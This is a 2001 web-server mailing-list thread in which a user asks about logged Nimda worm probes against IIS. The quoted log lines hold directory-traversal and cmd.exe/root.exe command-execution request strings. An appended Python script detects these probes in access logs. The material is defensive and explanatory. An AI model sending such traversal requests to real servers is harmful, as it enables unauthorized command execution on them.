These are Nimda attacks looking to an IIS server on NT.
----- Original Message -----
From: "Guardian Lew" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Monday, October 15, 2001 5:32 AM
Subject: RE: [sambar] Nimda interesting

> Can someone tell me what these few lines mean?
>
> 65.10.89.6 - - [13/Oct/2001:01:38:34 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
> 65.10.89.6 - - [13/Oct/2001:01:38:35 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
> 65.10.89.6 - - [13/Oct/2001:01:38:36 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
> 65.10.89.6 - - [13/Oct/2001:01:38:37 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
> 65.10.89.6 - - [13/Oct/2001:01:38:38 -0500] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
> 65.10.89.6 - - [13/Oct/2001:01:38:39 -0500] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
> 65.10.89.6 - - [13/Oct/2001:01:38:43 -0500] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
> 65.10.89.6 - - [13/Oct/2001:01:38:45 -0500] "GET /msadc/..%5c../..%5c../..%5c/..A../..A../..A../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
> 65.10.89.6 - - [13/Oct/2001:01:38:46 -0500] "GET /scripts/..A../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
> 65.10.89.6 - - [13/Oct/2001:01:38:47 -0500] "GET /scripts/..A/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
> 65.10.89.6 - - [13/Oct/2001:01:38:48 -0500] "GET /scripts/..A?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
> 65.10.89.6 - - [13/Oct/2001:01:38:50 -0500] "GET /scripts/..Ao../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
> 65.10.89.6 - - [13/Oct/2001:01:38:51 -0500] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
> 65.10.89.6 - - [13/Oct/2001:01:38:52 -0500] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
>
> God has special angels I know a lot.
> http://angelstore.net
>
> -----Original Message-----
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of Jeff Adams
> Sent: Sunday, October 14, 2001 10:19 PM
> To: [EMAIL PROTECTED]
> Subject: Re: [sambar] Nimda interesting
>
> At 09:33 PM 10/14/2001 -0500, Danny Mallory <[EMAIL PROTECTED]> wrote:
>
> >I have to agree. There are many fancier scanners out there. As I mentioned
> >the one that I wrote
> >is for quick floppy utility to gather information on a new network. If you
> >want ours you can get
> >it at http://www.cnsonline.com under toolshelp section.
> >
> >Danny
>
> Neat Perl script, Danny. The only problem I had was scanning a subnet with
> a third octet of 0 (i.e. 192.168.0.0). In my example, the code that sets
> the subnet variable (shown below) sets it to 192.168, thus the discovery
> searches for 192.168.1, 192.168.2, ..., 192.168.255.
>
> $subnet = substr($a, 0, index("$a",".0"));
>
> Other than that little issue, which I worked around easily, I found it to
> be a nice tool.
>
> Thanks for sharing!
>
> -Jeff
>
> --------------------------------------------------------------------------------
> For unsubscription of this list send an email to [EMAIL PROTECTED] with email
> data containing unsubscribe emailadd sambar
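
A log check for the request pattern quoted in this thread, as an added example that is not part of any message above: it flags requests for root.exe or cmd.exe with a "/c+" query, groups them by source address, and lists any that the server answered with a 2xx status instead of the 404s seen here. The sample log lines are constructed (192.0.2.x are documentation addresses) and the function names `classify` and `summarize` are hypothetical.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample in the access-log format quoted in the thread.
SAMPLE_LOG = '''\
192.0.2.10 - - [13/Oct/2001:01:38:34 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
192.0.2.10 - - [13/Oct/2001:01:38:38 -0500] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
192.0.2.10 - - [13/Oct/2001:01:38:39 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 200 512 0 "-" "-"
192.0.2.77 - - [13/Oct/2001:01:40:02 -0500] "GET /index.html HTTP/1.0" 200 1043 0 "-" "-"
this line is not a log entry
'''

# host ident user [timestamp] "METHOD target PROTO" status ...
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Path ends in the command interpreter names requested in the quoted log.
PROBE_RE = re.compile(r'/(?:root|cmd)\.exe$')

def classify(line):
    """Parse one log line; return None if it is not a log entry."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, method, target, status = m.groups()
    path, _, query = target.partition('?')
    # Decode %5c and treat backslash as a path separator before matching.
    norm = unquote(path).replace('\\', '/').lower()
    probe = bool(PROBE_RE.search(norm)) and query.lower().startswith('/c+')
    return {"ip": ip, "target": target, "status": status,
            "probe": probe, "traversal": probe and '..' in norm}

def summarize(log_text):
    """Per-source counts of probe requests, plus any that got a 2xx reply."""
    report = defaultdict(lambda: {"probes": 0, "traversal": 0, "answered": []})
    for line in log_text.splitlines():
        hit = classify(line)
        if hit and hit["probe"]:
            entry = report[hit["ip"]]
            entry["probes"] += 1
            entry["traversal"] += int(hit["traversal"])
            if hit["status"].startswith("2"):
                # The server served the request: this host needs a closer look.
                entry["answered"].append(hit["target"])
    return dict(report)

if __name__ == "__main__":
    for ip, info in summarize(SAMPLE_LOG).items():
        print(ip, info)
```
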
